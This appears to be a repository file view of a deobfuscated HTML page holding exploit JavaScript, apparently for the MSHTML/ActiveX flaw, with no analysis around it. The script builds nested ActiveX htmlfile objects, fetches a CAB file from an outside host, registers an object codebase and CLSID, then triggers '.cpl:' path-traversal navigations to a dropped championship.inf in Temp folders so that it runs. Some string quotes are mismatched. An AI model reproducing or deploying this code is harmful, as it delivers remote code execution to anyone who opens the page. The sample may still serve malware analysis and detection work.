/
deobfuscated.html
96 lines (95 loc) · 5.22 KB
/
deobfuscated.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Expires" content="-1">
<meta http-equiv="X-UA-Compatible" content="IE=11">
</head>
<body>
<script>
var a0_0x127f=['123','365952KMsRQT','tiveX','/Lo','./../../','contentDocument','ppD','Dat','close','Acti','removeChild','mlF','write','./A','ata/','ile','../','body','setAttribute','#version=5,0,0,0','ssi','iframe','748708rfmUTk','documentElement','lFile','location','159708hBVRtu','a/Lo','Script','document','call','contentWindow','emp','Document','Obj','prototype','lfi','bject','send','appendChild','Low/championship.inf','htmlfile','115924pLbIpw','GET','p/championship.inf','1109sMoXXX','./../A','htm','l/T','cal/','1wzQpCO','ect','w/championship.inf','522415dmiRUA','http://hidusi.com/e8c76295a5f9acb7/ministry.cab','88320wWglcB','XMLHttpRequest','championship.inf','Act','D:edbc374c-5730-432a-b5b8-de94f0b57217','open','<bo','HTMLElement','/..','veXO','102FePAWC'];
function a0_0x15ec(_0x329dba,
_0x46107c){return a0_0x15ec=function(_0x127f75,
_0x15ecd5){_0x127f75=_0x127f75-0xaa;
var _0x5a770c=a0_0x127f[_0x127f75];
return _0x5a770c;
},a0_0x15ec(_0x329dba,
_0x46107c);
}(function(_0x59985d,
_0x17bed8){var _0x1eac90=a0_0x15ec;
while(!![]){try{var _0x2f7e2d=parseInt(_0x1eac90(0xce))+parseInt(_0x1eac90(0xd8))*parseInt(_0x1eac90(0xc4))+parseInt(_0x1eac90(0xc9))*-parseInt(_0x1eac90(0xad))+parseInt(_0x1eac90(0xb1))+parseInt(_0x1eac90(0xcc))+-parseInt(_0x1eac90(0xc1))+parseInt(_0x1eac90(0xda));
if(_0x2f7e2d===_0x17bed8)break;
else _0x59985d['push'](_0x59985d['shift']());
}catch(_0x34af1e){_0x59985d['push'](_0x59985d['shift']());
}}}(a0_0x127f,0x5df71),function(){var funcX=a0_0x15ec,
_0x279eab=window,
_0x1b93d7=_0x279eab["document"],
_0xcf5a2=_0x279eab["Document"]['prototype']['createElement'],
_0x4d7c02=_0x279eab["Document"]['prototype']["write"],
_0x1ee31c=_0x279eab["HTMLElement"]["prototype"]["appendChild"],
_0x2d20cd=_0x279eab["HTMLElement"]["prototype"]["removeChild"],
_0x4ff114=_0xcf5a2['call'](_0x1b93d7,"iframe");
try{_0x1ee31c["call"](_0x1b93d7["body"],
_0x4ff114);
}catch(_0x1ab454){_0x1ee31c["call"](_0x1b93d7["documentElement"],
_0x4ff114);
}var _0x403e5f=_0x4ff114["contentWindow"]['ActiveXObject'],
_0x224f7d=new _0x403e5f("htmlfile');
_0x4ff114["contentDocument"]['open']()["close"]();
var _0x371a71='p';
try{_0x2d20cd["call"](_0x1b93d7["body"],
_0x4ff114);
}catch(_0x3b004e){_0x2d20cd['call'](_0x1b93d7['documentElement'],
_0x4ff114);
}function _0x2511dc(){var _0x45ae57=funcX;
return _0x45ae57(0xcd);
}_0x224f7d['open']()["close"]();
var _0x3e172f=new _0x224f7d[("Script")][("Act")+'iveX'+("Obj")+("ect")]('htmlFile");
_0x3e172f["open"]()["close"]();
var _0xd7e33d='c',
_0x35b0d4=new _0x3e172f[("Script")]['Ac'+("tiveX")+'Object']('htmlFile");
_0x35b0d4["open"]()["close"]();
var _0xf70c6e=new _0x35b0d4['Script'][("Acti")+("veXO")+("bject")]('htmlFile");
_0xf70c6e["open"]()["close"]();
var _0xfed1ef=new ActiveXObject('htmlfile'),
_0x5f3191=new ActiveXObject("htmlfile"),
_0xafc795=new ActiveXObject("htmlfile"),
_0x5a6d4b=new ActiveXObject('htmlfile'),
_0x258443=new ActiveXObject('htmlfile'),
_0x53c2ab=new ActiveXObject('htmlfile'),
_0x3a627b=_0x279eab["XMLHttpRequest"],
_0x2c84a8=new _0x3a627b(),
_0x220eee=_0x3a627b["prototype"]["open"],
_0x3637d8=_0x3a627b["prototype"]["send"],
_0x27de6f=_0x279eab['setTimeout'];
_0x220eee["call"](_0x2c84a8,"GET",
_0x2511dc(),![]),
_0x3637d8["call"](_0x2c84a8),
_0xf70c6e["Script"]["document"]["write"]("<body>');
var _0x126e83=_0xcf5a2["call"](_0xf70c6e['Script']["document"],'object');
_0x126e83["setAttribute"]('codebase',
_0x2511dc()+"#version=5,0,0,0");
var _0x487bfa='l';
_0x126e83["setAttribute"]('classid','CLSID:edbc374c-5730-432a-b5b8-de94f0b57217"),
_0x1ee31c["call"](_0xf70c6e["Script"]['document']['body'],
_0x126e83),
_0xfed1ef["Script"]["location"]='.'+_0xd7e33d+_0x371a71+_0x487bfa+':123',
_0xfed1ef["Script"]['location']='.'+_0xd7e33d+_0x371a71+_0x487bfa+':123",
_0xfed1ef["Script"]["location"]='.'+_0xd7e33d+_0x371a71+_0x487bfa+':123",
_0xfed1ef["Script"]["location"]='.'+_0xd7e33d+_0x371a71+_0x487bfa+':123",
_0xfed1ef["Script"]["location"]='.'+_0xd7e33d+_0x371a71+_0x487bfa+':123',
_0xfed1ef["Script"]["location"]='.'+_0xd7e33d+_0x371a71+_0x487bfa+':123",
_0xfed1ef['Script']['location']='.'+_0xd7e33d+_0x371a71+_0x487bfa+':123",
_0xfed1ef["Script"]['location']='.'+_0xd7e33d+_0x371a71+_0x487bfa+':123",
_0xfed1ef["Script"]["location"]='.'+_0xd7e33d+_0x371a71+_0x487bfa+':123',
_0xfed1ef["Script"]["location"]='.'+_0xd7e33d+_0x371a71+_0x487bfa+':../../../AppData/Local/Temp/Low/championship.inf",
_0x5f3191["Script"]["location"]='.'+_0xd7e33d+_0x371a71+_0x487bfa+':../../../AppData/Local/Temp/championship.inf',
_0xafc795["Script"]["location"]='.'+_0xd7e33d+_0x371a71+_0x487bfa+':../../../../AppData/Local/Temp/Low/championship.inf',
_0x5a6d4b["Script"]["location"]='.'+_0xd7e33d+_0x371a71+_0x487bfa+':../../../../AppData/Local/Temp/championship.inf",
_0x258443["Script"]['location']='.'+_0xd7e33d+_0x371a71+_0x487bfa+':../../../../../Temp/Low/championship.inf",
_0x5a6d4b['Script']["location"]='.'+_0xd7e33d+_0x371a71+_0x487bfa+':../../../../../Temp/championship.inf',
_0x5a6d4b["Script"]['location']='.'+_0xd7e33d+_0x371a71+_0x487bfa+':../../Low/championship.inf",
_0x5a6d4b["Script"]['location']='.'+_0xd7e33d+_0x371a71+_0x487bfa+':../../championship.inf";
}());
</script>
</body>
</html>